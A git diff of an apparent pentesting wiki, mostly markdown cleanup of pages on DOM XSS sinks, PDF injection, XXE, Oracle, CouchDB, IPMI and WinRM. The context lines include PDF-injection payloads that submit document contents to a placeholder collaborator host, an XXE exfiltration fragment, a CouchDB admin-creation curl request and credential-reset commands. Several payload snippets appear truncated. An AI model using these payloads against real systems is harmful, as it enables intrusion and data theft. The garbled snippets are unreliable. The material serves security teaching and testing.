@@ -37,7 +37,7 @@ Database **Common Sinks:** -| ****[**Open Redirect**](dom-xss.md#open-redirect)**** | [**Javascript Injection**](dom-xss.md#javascript-injection)**** | [**DOM-data manipulation**](dom-xss.md#dom-data-manipulation)**** | **jQuery** | +| [**Open Redirect**](dom-xss.md#open-redirect) | [**Javascript Injection**](dom-xss.md#javascript-injection) | [**DOM-data manipulation**](dom-xss.md#dom-data-manipulation) | **jQuery** | | ---------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------- | ----------------------------------------------------------------- | ------------------------------------------------------------------------------ | | `location` | `eval()` | `scriptElement.src` | `add()` | | `location.host` | `Function() constructor` | `scriptElement.text` | `after()` | 
@@ -49,27 +49,27 @@ Database | `location.assign()` | `msSetImmediate()` | `someDOMElement.textContent` | `html()` | | `location.replace()` | `range.createContextualFragment()` | `someDOMElement.innerText` | `prepend()` | | `open()` | `crypto.generateCRMFRequest()` | `someDOMElement.outerText` | `replaceAll()` | -| `domElem.srcdoc` | **``**[**Local file-path manipulation**](dom-xss.md#local-file-path-manipulation)**** | `someDOMElement.value` | `replaceWith()` | +| `domElem.srcdoc` | **``**[**Local file-path manipulation**](dom-xss.md#local-file-path-manipulation) | `someDOMElement.value` | `replaceWith()` | | `XMLHttpRequest.open()` | `FileReader.readAsArrayBuffer()` | `someDOMElement.name` | `wrap()` | | `XMLHttpRequest.send()` | `FileReader.readAsBinaryString()` | `someDOMElement.target` | `wrapInner()` | | `jQuery.ajax()` | `FileReader.readAsDataURL()` | `someDOMElement.method` | `wrapAll()` | | `$.ajax()` | `FileReader.readAsText()` | `someDOMElement.type` | `has()` | -| **``**[**Ajax request manipulation**](dom-xss.md#ajax-request-manipulation)**** | `FileReader.readAsFile()` | `someDOMElement.backgroundImage` | `constructor()` | +| **``**[**Ajax request manipulation**](dom-xss.md#ajax-request-manipulation) | `FileReader.readAsFile()` | `someDOMElement.backgroundImage` | `constructor()` | | `XMLHttpRequest.setRequestHeader()` | `FileReader.root.getFile()` | `someDOMElement.cssText` | `init()` | | `XMLHttpRequest.open()` | `FileReader.root.getFile()` | `someDOMElement.codebase` | `index()` | -| `XMLHttpRequest.send()` | ****[**Link manipulation**](dom-xss.md#link-manipulation)**** | `someDOMElement.innerHTML` | `jQuery.parseHTML()` | +| `XMLHttpRequest.send()` | [**Link manipulation**](dom-xss.md#link-manipulation) | `someDOMElement.innerHTML` | `jQuery.parseHTML()` | | `jQuery.globalEval()` | `someDOMElement.href` | `someDOMElement.outerHTML` | `$.parseHTML()` | -| `$.globalEval()` | `someDOMElement.src` | `someDOMElement.insertAdjacentHTML` | 
****[**Client-side JSON injection**](dom-xss.md#client-side-sql-injection)**** | -| **``**[**HTML5-storage manipulation**](dom-xss.md#html-5-storage-manipulation)**** | `someDOMElement.action` | `someDOMElement.onevent` | `JSON.parse()` | -| `sessionStorage.setItem()` | [**XPath injection**](dom-xss.md#xpath-injection)**** | `document.write()` | `jQuery.parseJSON()` | +| `$.globalEval()` | `someDOMElement.src` | `someDOMElement.insertAdjacentHTML` | [**Client-side JSON injection**](dom-xss.md#client-side-sql-injection) | +| **``**[**HTML5-storage manipulation**](dom-xss.md#html-5-storage-manipulation) | `someDOMElement.action` | `someDOMElement.onevent` | `JSON.parse()` | +| `sessionStorage.setItem()` | [**XPath injection**](dom-xss.md#xpath-injection) | `document.write()` | `jQuery.parseJSON()` | | `localStorage.setItem()` | `document.evaluate()` | `document.writeln()` | `$.parseJSON()` | -| **``**[**`Denial of Service`**](dom-xss.md#denial-of-service)**``** | `someDOMElement.evaluate()` | `document.title` | **``**[**Cookie manipulation**](dom-xss.md#cookie-manipulation)**** | -| `requestFileSystem()` | **``**[**Document-domain manipulation**](dom-xss.md#document-domain-manipulation)**** | `document.implementation.createHTMLDocument()` | `document.cookie` | -| `RegExp()` | `document.domain` | `history.pushState()` | ****[**WebSocket-URL poisoning**](dom-xss.md#websocket-url-poisoning)**** | -| ****[**Client-Side SQl injection**](dom-xss.md#client-side-sql-injection)**** | ****[**Web-message manipulation**](dom-xss.md#web-message-manipulation)**** | `history.replaceState()` | `WebSocket` | +| **``**[**`Denial of Service`**](dom-xss.md#denial-of-service)**``** | `someDOMElement.evaluate()` | `document.title` | **``**[**Cookie manipulation**](dom-xss.md#cookie-manipulation) | +| `requestFileSystem()` | **``**[**Document-domain manipulation**](dom-xss.md#document-domain-manipulation) | `document.implementation.createHTMLDocument()` | `document.cookie` | +| `RegExp()` 
| `document.domain` | `history.pushState()` | [**WebSocket-URL poisoning**](dom-xss.md#websocket-url-poisoning) | +| [**Client-Side SQl injection**](dom-xss.md#client-side-sql-injection) | [**Web-message manipulation**](dom-xss.md#web-message-manipulation) | `history.replaceState()` | `WebSocket` | | `executeSql()` | `postMessage()` | `` | `` | - The **`innerHTML`** sink doesn't accept `script` elements on any modern browser, nor will `svg onload` events fire. This means you will need to use alternative elements like `img` or `iframe`. +The **`innerHTML`** sink doesn't accept `script` elements on any modern browser, nor will `svg onload` events fire. This means you will need to use alternative elements like `img` or `iframe`. This kind of XSS is probably the **hardest to find**, as you need to look inside the JS code, see if it's **using** any object whose **value you control**, and in that case, see if there is **any way to abuse** it to execute arbitrary JS. @@ -155,7 +155,7 @@ 
From: [https://portswigger.net/web-security/dom-based/document-domain-manipulati Document-domain manipulation vulnerabilities arise when a script uses **attacker-controllable data to set** the **`document.domain`** property. - The `document.domain` property is used by browsers in their **enforcement** of the **same origin policy**. If **two pages** from **different** origins explicitly set the **same `document.domain`** value, then those two pages can **interact in unrestricted ways**.\ +The `document.domain` property is used by browsers in their **enforcement** of the **same origin policy**. If **two pages** from **different** origins explicitly set the **same `document.domain`** value, then those two pages can **interact in unrestricted ways**.\ Browsers **generally enforce some restrictions** on the values that can be assigned to `document.domain`, and may prevent the use of completely different values than the actual origin of the page. **But this doesn't occur always** and they usually **allow to use child** or **parent** domains. #### Sinks @@ -174,7 +174,7 @@ WebSocket-URL poisoning occurs when a script uses **controllable data as the tar #### Sinks - The `WebSocket` constructor can lead to WebSocket-URL poisoning vulnerabilities. +The `WebSocket` constructor can lead to WebSocket-URL poisoning vulnerabilities. ### Link manipulation diff --git a/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/pentesting-web/xss-cross-site-scripting/pdf-injection.md index 7ee49311..a77dd93b 100644 --- a/pentesting-web/xss-cross-site-scripting/pdf-injection.md +++ b/pentesting-web/xss-cross-site-scripting/pdf-injection.md 
@@ -2,35 +2,35 @@ **If your input is being reflected inside a PDF file, you can try to inject PDF data to execute JavaScript or steal the PDF content.** -The following information was taken from [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)**** +The following information was taken from [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration) ### PDF-Lib This time, I was using [PDFLib](https://pdf-lib.js.org). I took some time to use the library to create an annotation and see if I could inject a closing parenthesis into the annotation URI - and it worked! The sample vulnerable code I used to generate the annotation code was: `...` \ - `A: {`\ - `Type: 'Action',`\ - `S: 'URI',`\ - ``URI: PDFString.of(`injection)`),``\ - `}`\ - `})`\ - `...` +`A: {`\ + `Type: 'Action',`\ + `S: 'URI',`\ + ``URI: PDFString.of(`injection)`),``\ + `}`\ + `})`\ +`...` [Full code:](https://github.com/PortSwigger/portable-data-exfiltration/blob/main/PDF-research-samples/pdf-lib/first-injection/test.js) How did I know the injection was successful? The PDF would render correctly unless I injected a closing parenthesis. This proved that the closing parenthesis was breaking out of the string and causing invalid PDF code. Breaking the PDF was nice, but I needed to ensure I could execute JavaScript of course. I looked at the rendered PDF code and noticed the output was being encoded using the FlateDecode filter. 
I wrote a little script to deflate the block and the output of the annotation section looked like this:`<<`\ - `/Type /Annot`\ - `/Subtype /Link`\ - `/Rect [ 50 746.89 320 711.89 ]`\ - `/Border [ 0 0 2 ]`\ - `/C [ 0 0 1 ]`\ - `/A <<`\ - `/Type /Action`\ - `/S /URI`\ - `/URI (injection))`\ - `>>`\ - `>>` +`/Type /Annot`\ +`/Subtype /Link`\ +`/Rect [ 50 746.89 320 711.89 ]`\ +`/Border [ 0 0 2 ]`\ +`/C [ 0 0 1 ]`\ +`/A <<`\ +`/Type /Action`\ +`/S /URI`\ +`/URI (injection))`\ +`>>`\ +`>>` As you can clearly see, the injection string is closing the text boundary with a closing parenthesis, which leaves an existing closing parenthesis that causes the PDF to be rendered incorrectly: 
@@ -41,9 +41,9 @@ Great, so I could break the rendering of the PDF, now what? I needed to come up Just like how XSS vectors depend on the browser's parsing, PDF injection exploitability can depend on the PDF renderer. I decided to start by targeting Acrobat because I thought the vectors were less likely to work in Chrome. Two things I noticed: 1) You could inject additional annotation actions and 2) if you repair the existing closing parenthesis then the PDF would render. After some experimentation, I came up with a nice payload that injected an additional annotation action, executed JavaScript, and repaired the closing parenthesis:`/blah)>>/A<>/>>(` First I break out of the parenthesis, then break out of the dictionary using >> before starting a new annotation dictionary. The /S/JavaScript makes the annotation JavaScript-based and the /JS is where the JavaScript is stored. Inside the parentheses is our actual JavaScript. Note that you don't have to escape the parentheses if they're balanced. Finally, I add the type of annotation, finish the dictionary, and repair the closing parenthesis. This was so cool; I could craft an injection that executed JavaScript but so what, right? You can execute JavaScript but you don't have access to the DOM, so you can't read cookies. Then James popped up and suggested stealing the contents of the PDF from the injection. I started looking at ways to get the contents of a PDF. In Acrobat, I discovered that you can use JavaScript to submit forms without any user interaction! Looking at the spec for the JavaScript API, it was pretty straightforward to modify the base injection and add some JavaScript that would send the entire contents of the PDF code to an external server in a POST request:`/blah)>>/A<>/>>(` +`this.submitForm({`\ +`cURL: 'https://your-id.burpcollaborator.net',cSubmitAs: 'PDF'}))`\ +`/Type/Action>>/>>(` The alert is not needed; I just added it to prove the injection was executing JavaScript. 
@@ -52,32 +52,32 @@ Next, just for fun, I looked at stealing the contents of the PDF without using J To set a flag, you first need to look up its bit position (table 237 of the [PDF specification](https://www.adobe.com/content/dam/acom/en/devnet/pdf/pdfs/PDF32000\_2008.pdf)). In this case, we want to set the SubmitPDF flag. As this is controlled by the 9th bit, you just need to count 9 bits from the right:`0b00000100000000` If you evaluate this with JavaScript, this results in the decimal value 256. In other words, setting the Flags entry to 256 will enable the SubmitPDF flag, which causes the contents of the PDF to be sent when submitting the form. All we need to do is use the base injection we created earlier and modify it to call the SubmitForm action instead of JavaScript:`/blah)>>/A<>/>>(` +`https://your-id.burpcollaborator.net)`\ +`/Type/Action>>/>>(` ### sPDF Next I applied my methodology to another PDF library - [jsPDF](https://parall.ax/products/jspdf) - and found it was vulnerable too. Exploiting this library was quite fun because they have an API that can execute in the browser and will allow you to generate the PDF in real time as you type. I noticed that, like the PDP-Lib library, they forgot to escape parentheses inside annotation URLs. 
Here the url property was vulnerable:`doc.createAnnotation({bounds:`\ - `{x:0,y:10,w:200,h:200},`\ - ``type:'link',url:`/input`});``\ - `//vulnerable` +`{x:0,y:10,w:200,h:200},`\ +``type:'link',url:`/input`});``\ +`//vulnerable` So I generated a PDF using their API and injected PDF code into the url property: `var doc = new jsPDF();`\ - `doc.text(20, 20, 'Hello world!');`\ - `doc.addPage('a6','l');`\ - `doc.createAnnotation({bounds:`\ - `` {x:0,y:10,w:200,h:200},type:'link',url:` ``\ - `/blah)>>/A<>/A<>/A<> >>`\ - `<> >>`\ - ``<>/(`});``\ - `doc.text(20, 20, 'Auto execute');` +``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/)``\ +`>> >>`\ +``<>/(`});``\ +`doc.text(20, 20, 'Auto execute');` When you close the PDF, this annotation will fire:`var doc = new jsPDF();`\ - ``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>``\ - ``<>/(`});``\ - `doc.text(20, 20, 'Close me');` +``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>``\ +``<>/(`});``\ +`doc.text(20, 20, 'Close me');` ### Chrome I've talked a lot about Acrobat but what about PDFium (Chrome's PDF reader)? Chrome is tricky; the attack surface is much smaller as its JavaScript support is more limited than Acrobat's. The first thing I noticed was that JavaScript wasn't being executed in annotations at all, so my proof of concepts weren't working. In order to get the vectors working in Chrome, I needed to at least execute JavaScript inside annotations. First though, I decided to try and overwrite a URL in an annotation. This was pretty easy. 
I could use the base injection I came up with before and simply inject another action with a URI entry that would overwrite the existing URL:`var doc = new jsPDF();`\ - ``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/blah)>>/A<>/F 0>>(`});``\ - `doc.text(20, 20, 'Test text');` +``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/blah)>>/A<>/F 0>>(`});``\ +`doc.text(20, 20, 'Test text');` This would navigate to portswigger.net when clicked. Then I moved on and tried different injections to call JavaScript, but this would fail every time. I thought it was impossible to do. I took a step back and tried to manually construct an entire PDF that would call JavaScript from a click in Chrome without an injection. When using an AcroForm button, Chrome would allow JavaScript execution, but the problem was it required references to parts of the PDF. I managed to craft an injection that would execute JavaScript from a click on JSPDF:`var doc = new jsPDF();`\ - ``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >> <>/Type/Annot/MK<>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<>>>/Parent <>/H/P/A<> >> <>/Type/Annot/MK<>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<>>>/Parent <>/H/P/A<> >> <>/Type/Annot/MK<>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<>>>/Parent <>/H/P/A<> >> <>/Type/Annot/MK<>/Rect [ 0 0 889 792]/Subtype/Widget/AP<>>>/Parent <>/H/P/A<>>><>/A<>>><>/A<> <>/A<> <>/A<> <>/A<> <>/A<> >>``\ - ``<> /Rect [0 0 900 900] /AA <>/(`});``\ - `doc.text(20, 20, 'Test');`\ +``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>``\ +``<> /Rect [0 0 900 900] /AA <>/(`});``\ +`doc.text(20, 20, 'Test');`\ `` ### SSRF in PDFium/Acrobat It's possible to send a POST request with PDFium/Acrobat to perform a SSRF attack. This would be a [blind SSRF](https://portswigger.net/web-security/ssrf/blind) since you can make a POST request but can't read the response. 
To construct a POST request, you can use the /parent dictionary key as demonstrated earlier to assign a form element to the annotation, enabling JavaScript execution. But instead of using a button like we did before, you can assign a text field (/Tx) with the parameter name (/T) and parameter value (/V) dictionary keys. Notice how you have to pass the parameter names you want to use to the submitForm function as an array:`#)>>>><>/A<> >> <>/A<> >> <>/A<) -_**Please notice that external DTD allows us to include one entity inside the second (****`eval`****), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).**_ +_**Please notice that external DTD allows us to include one entity inside the second (`eval`), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).**_ ### **Error Based (system DTD)** @@ -547,7 +547,7 @@ You can create an **entity inside an entity** encoding it with **html entities** Note that the **HTML Entities** used needs to be **numeric** (like \[in this example]\([https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C)). ```markup -%a;%dtd;]> +%a;%dtd;]> &exfil; diff --git a/pentesting/1521-1522-1529-pentesting-oracle-listener/README.md b/pentesting/1521-1522-1529-pentesting-oracle-listener/README.md index e5dee3ca..a818321e 100644 --- a/pentesting/1521-1522-1529-pentesting-oracle-listener/README.md +++ b/pentesting/1521-1522-1529-pentesting-oracle-listener/README.md 
@@ -103,7 +103,7 @@ pip3 install cx_Oracle --upgrade **Got SID?** Excellent, now let’s move to the next task and extract the user account information. From this point, you can connect to the listener and brute-force credentials. -**Metasploit** _\*\*scanner/oracle/oracle\_login_ It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle. +**Metasploit** _**scanner/oracle/oracle\_login_ It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle. **Nmap** can also help here with the script _oracle-brute_. Note that this script **mixes the logins and passwords**, that is, it tries each login against every password, and it takes quite a while! @@ -188,7 +188,7 @@ If ODAT **founds at least one SID** \(e.g. _ORCL_\), it will **search valid Orac For **each valid account** \(e.g. _SYS_\) **on each valid instance** \(SID\), ODAT will return **what each Oracle user can do** \(e.g. reverse shell, read files, become DBA\). -[**Wiki odat**](https://github.com/quentinhardy/odat/wiki)\*\*\*\* +[**Wiki odat**](https://github.com/quentinhardy/odat/wiki) ## Remote Code Execution diff --git a/pentesting/15672-pentesting-rabbitmq-management.md b/pentesting/15672-pentesting-rabbitmq-management.md index 83410f0d..59405ad4 100644 --- a/pentesting/15672-pentesting-rabbitmq-management.md +++ b/pentesting/15672-pentesting-rabbitmq-management.md 
@@ -12,7 +12,7 @@ The main page should looks like this: The default credentials are "_**guest**_":"_**guest**_". If they aren't working you may try to [**brute-force the login**](../brute-force.md#http-post-form). -To manually start this module you need to execute: +To manually start this module you need to execute: ``` rabbitmq-plugins enable rabbitmq_management diff --git a/pentesting/1883-pentesting-mqtt-mosquitto.md b/pentesting/1883-pentesting-mqtt-mosquitto.md index 00b222ee..de11bcfe 100644 --- a/pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/pentesting/1883-pentesting-mqtt-mosquitto.md @@ -17,7 +17,7 @@ MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The ![](<../.gitbook/assets/image (645) (1).png>) -### ****[**Brute-Force MQTT**](../brute-force.md#mqtt)**** +### [**Brute-Force MQTT**](../brute-force.md#mqtt) ## Pentesting MQTT @@ -31,7 +31,7 @@ To connect to a MQTT service you can use: [https://github.com/bapowell/python-mq > subscribe "$SYS/#" ``` -You could also use [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn)**** +You could also use [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn) You can also use: diff --git a/pentesting/2375-pentesting-docker.md b/pentesting/2375-pentesting-docker.md index 9df93bc4..a9940bc7 100644 --- a/pentesting/2375-pentesting-docker.md +++ b/pentesting/2375-pentesting-docker.md 
@@ -67,7 +67,7 @@ ctr container delete ### Podman -**Info** [**from here**](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html#:\~:text=What%20is%20Podman%3F,and%20support%20for%20rootless%20containers.)**** +**Info** [**from here**](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html#:\~:text=What%20is%20Podman%3F,and%20support%20for%20rootless%20containers.) Podman is an open source, OCI ([Open Container Initiative](https://github.com/opencontainers)) compliant container engine. It is driven by Red Hat and incorporates a few major differences from Docker, such as its daemonless architecture and support for rootless containers. At their core, **both tools do the same thing: manage images and containers**. One of **Podman’s objectives is to have a Docker-compatible API**. Hence almost all CLI (command line interface) commands from the Docker CLI are also available in Podman. @@ -247,7 +247,7 @@ docker cp :/etc/ ### Securing Docker installation and usage * You can use the tool [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) to inspect your current docker installation. - * `./docker-bench-security.sh` + * `./docker-bench-security.sh` * You can use the tool [https://github.com/kost/dockscan](https://github.com/kost/dockscan) to inspect your current docker installation. * `dockscan -v unix:///var/run/docker.sock` * You can use the tool [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) the privileges a container will have when run with different security options. This is useful to know the implications of using some security options to run a container: diff --git a/pentesting/24007-24008-24009-49152-pentesting-glusterfs.md b/pentesting/24007-24008-24009-49152-pentesting-glusterfs.md index 7ba6a4b5..aaf1a428 100644 --- a/pentesting/24007-24008-24009-49152-pentesting-glusterfs.md +++ b/pentesting/24007-24008-24009-49152-pentesting-glusterfs.md 
@@ -15,7 +15,7 @@ PORT STATE SERVICE ### Enumeration -To interact with this filesystem you need to install the [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) **** (`sudo apt-get install glusterfs-cli`). +To interact with this filesystem you need to install the [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`). To list and mount the available volumes you can use: diff --git a/pentesting/27017-27018-mongodb.md b/pentesting/27017-27018-mongodb.md index 67f6c9b8..eac359f7 100644 --- a/pentesting/27017-27018-mongodb.md +++ b/pentesting/27017-27018-mongodb.md @@ -70,7 +70,7 @@ The nmap script: _**mongodb-brute**_ will check if creds are needed. nmap -n -sV --script mongodb-brute -p 27017 ``` -### [**Brute force**](../brute-force.md#mongo)**** +### [**Brute force**](../brute-force.md#mongo) Look inside _/opt/bitnami/mongodb/mongodb.conf_ to know if credentials are needed: diff --git a/pentesting/3260-pentesting-iscsi.md b/pentesting/3260-pentesting-iscsi.md index 452e5afa..c85d44b1 100644 --- a/pentesting/3260-pentesting-iscsi.md +++ b/pentesting/3260-pentesting-iscsi.md @@ -161,7 +161,7 @@ node.conn[0].iscsi.OFMarker = No # END RECORD ``` -**There is a script to automate basic subnet enumeration process available at** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability_Analysis/isciadm)\*\*\*\* +**There is a script to automate basic subnet enumeration process available at** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability_Analysis/isciadm) ## **Shodan** diff --git a/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md b/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md index 87b36dbb..9af918a0 100644 --- a/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md +++ b/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md 
@@ -1,6 +1,6 @@ # 50030,50060,50070,50075,50090 - Pentesting Hadoop -**Information taken from the book** [**Network Security Assesment 3rd Edition**](https://www.amazon.com/Network-Security-Assessment-Know-Your-ebook/dp/B01N6E0BG2)**** +**Information taken from the book** [**Network Security Assesment 3rd Edition**](https://www.amazon.com/Network-Security-Assessment-Know-Your-ebook/dp/B01N6E0BG2) ## **Basic Information** diff --git a/pentesting/512-pentesting-rexec.md b/pentesting/512-pentesting-rexec.md index 7eb21222..a1f63abd 100644 --- a/pentesting/512-pentesting-rexec.md +++ b/pentesting/512-pentesting-rexec.md @@ -11,4 +11,4 @@ PORT STATE SERVICE 512/tcp open exec ``` -### ****[**Brute-force**](../brute-force.md#rexec)**** +### [**Brute-force**](../brute-force.md#rexec) diff --git a/pentesting/515-pentesting-line-printer-daemon-lpd.md b/pentesting/515-pentesting-line-printer-daemon-lpd.md index 154696f2..d60897fd 100644 --- a/pentesting/515-pentesting-line-printer-daemon-lpd.md +++ b/pentesting/515-pentesting-line-printer-daemon-lpd.md 
@@ -1,7 +1,7 @@ # 515 - Pentesting Line Printer Daemon (LPD) The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 80s (later specified by RFC1179).\ -The daemon runs on port 515/tcp and can be accessed using the `lpr`command. To print, the client sends a **control file** defining job/username and a **data file** containing the actual data to be printed. The **input type** of the data file can be set in the control file by choosing among **various file formats**. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is LPRng. LPD can be used as a carrier to deploy **malicious PostScript** or **PJL print jobs**. +The daemon runs on port 515/tcp and can be accessed using the `lpr`command. To print, the client sends a **control file** defining job/username and a **data file** containing the actual data to be printed. The **input type** of the data file can be set in the control file by choosing among **various file formats**. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is LPRng. LPD can be used as a carrier to deploy **malicious PostScript** or **PJL print jobs**. The `lpdprint` and `lpdtest` tools are included in [**PRET**](https://github.com/RUB-NDS/PRET)**.** They are a minimalist way to print data directly to an LPD capable printer or download/upload/delete files and more: diff --git a/pentesting/554-8554-pentesting-rtsp.md b/pentesting/554-8554-pentesting-rtsp.md index 36b000d0..e129c418 100644 --- a/pentesting/554-8554-pentesting-rtsp.md +++ b/pentesting/554-8554-pentesting-rtsp.md 
@@ -55,7 +55,7 @@ print(data) Voila! You have access. -**From:** [**http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/**](https://web.archive.org/web/20161020202643/http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/)**** +**From:** [**http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/**](https://web.archive.org/web/20161020202643/http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/) ## Enumeration diff --git a/pentesting/584-pentesting-afp.md b/pentesting/584-pentesting-afp.md index 6ffbde21..3ff6ec4c 100644 --- a/pentesting/584-pentesting-afp.md +++ b/pentesting/584-pentesting-afp.md @@ -25,4 +25,4 @@ nmap -sV --script "afp-* and not dos and not brute" -p | afp-serverinfo | Displays AFP server information | | afp-showmount | Lists available AFP shares and respective ACLs | -### [**Brute Force**](../brute-force.md#afp)**** +### [**Brute Force**](../brute-force.md#afp) diff --git a/pentesting/5984-pentesting-couchdb.md b/pentesting/5984-pentesting-couchdb.md index e37be7c8..bf097f4f 100644 --- a/pentesting/5984-pentesting-couchdb.md +++ b/pentesting/5984-pentesting-couchdb.md @@ -131,7 +131,7 @@ Thanks to the differences between Erlang and JavaScript JSON parsers you could * curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json" ``` -\*\*\*\*[**More information about this vuln here**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html). +[**More information about this vuln here**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html). ## CouchDB RCE diff --git a/pentesting/5985-5986-pentesting-omi.md b/pentesting/5985-5986-pentesting-omi.md index 552547dc..e26acaab 100644 --- a/pentesting/5985-5986-pentesting-omi.md +++ b/pentesting/5985-5986-pentesting-omi.md 
@@ -17,7 +17,7 @@ When these services are configured, the omiengine process will listen on all int **Default port:** 5985(http), 5986(https) -## [CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647) +## [CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647) As of September 16, newly created Linux servers in Azure are still packaged with a vulnerable version of the OMI agent. After deploying a Linux server and enabling one the services listed above, the server will be in a vulnerable state. diff --git a/pentesting/5985-5986-pentesting-winrm.md b/pentesting/5985-5986-pentesting-winrm.md index 162105c9..5b1061c7 100644 --- a/pentesting/5985-5986-pentesting-winrm.md +++ b/pentesting/5985-5986-pentesting-winrm.md @@ -26,7 +26,7 @@ Set-Item wsman:\localhost\client\trustedhosts * This adds a wildcard to the trustedhosts setting. Be wary of what that entails. _Note: I also had to change the network type on my attack machine from "Public" to "Work" network._ -You can also **activate** WinRM **remotely** _\*\*\_using \_wmic_: +You can also **activate** WinRM **remotely** _**\_using \_wmic_: ``` wmic /node: process call create "powershell enable-psremoting -force" diff --git a/pentesting/623-udp-ipmi.md b/pentesting/623-udp-ipmi.md index 128023ec..149cb61a 100644 --- a/pentesting/623-udp-ipmi.md +++ b/pentesting/623-udp-ipmi.md @@ -1,6 +1,6 @@ # 623/UDP/TCP - IPMI -**Information taken from** [**https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/**](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)**** +**Information taken from** [**https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/**](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/) ## Basic Information 
@@ -72,7 +72,7 @@ root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set pass ### Vulnerability - IPMI Anonymous Authentication - In addition to the authentication problems above, Dan Farmer noted that **many BMCs ship with "anonymous" access enabled by default**. This is configured by setting the username of the first **user** account to a **null string** and **setting** a **null password** to match. The _ipmi\_dumphashes_ module will identify and dump the password hashes (including blank passwords) for null user accounts. **This account can be difficult to use on its own, but we can leverage `ipmitool` to reset the password of a named user account** and leverage that account for access to other services: +In addition to the authentication problems above, Dan Farmer noted that **many BMCs ship with "anonymous" access enabled by default**. This is configured by setting the username of the first **user** account to a **null string** and **setting** a **null password** to match. The _ipmi\_dumphashes_ module will identify and dump the password hashes (including blank passwords) for null user accounts. **This account can be difficult to use on its own, but we can leverage `ipmitool` to reset the password of a named user account** and leverage that account for access to other services: ```bash ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list diff --git a/pentesting/6379-pentesting-redis.md b/pentesting/6379-pentesting-redis.md index a0e0cc31..838be4d1 100644 --- a/pentesting/6379-pentesting-redis.md +++ b/pentesting/6379-pentesting-redis.md 
